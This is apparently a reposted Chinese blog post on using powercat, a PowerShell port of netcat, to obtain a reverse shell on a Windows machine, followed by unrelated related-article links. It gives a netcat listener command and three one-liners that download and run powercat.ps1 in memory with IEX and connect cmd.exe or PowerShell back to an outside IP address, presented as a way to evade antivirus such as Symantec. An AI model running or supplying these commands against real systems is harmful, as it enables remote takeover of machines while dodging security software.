利用powercat反弹shell

powercat是一个PowerShell版的netcat，可用于反弹shell、传输文件等。GitHub项目地址：https://github.com/besimorhino/powercat

使用powercat反弹shell无需将exe文件下载到服务器上，直接通过http请求加载PowerShell脚本，能有效绕过杀毒软件的查杀。

第1步：在VPS上监听443端口

netcat -l -p 443

第2步：反弹shell

# 反弹cmd shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 102.78.2.84 -p 443 -e cmd.exe

# 反弹PowerShell shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 102.78.2.84 -p 443 -e powershell.exe

# 反弹PowerShell shell，此方法可以绕过某些杀毒软件，如：赛门铁克
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 102.78.2.84 -p 80 -ep

查看全文

相关阅读:
hdu 2141 二分搜索
 什么是你的核心竞争力之一？
Ubuntu系统开机后显示器提示“不能显示此视频模式，请将电脑显示输入设置为1920×1080@60Hz”
[置顶] java高级工程师struts的内部运行机制详解
 一步步理解Linux进程（3）内核中进程的实现
 2013年4月19日佳都新太笔试题+解答
 Android 通过Service单独进程模仿离线推送 Server Push
缓存研究
 解决MDK4以上版本没法对STM32软件仿真
 windows调试器之Visual C++

原文地址：https://www.cnblogs.com/dgjnszf/p/11428007.html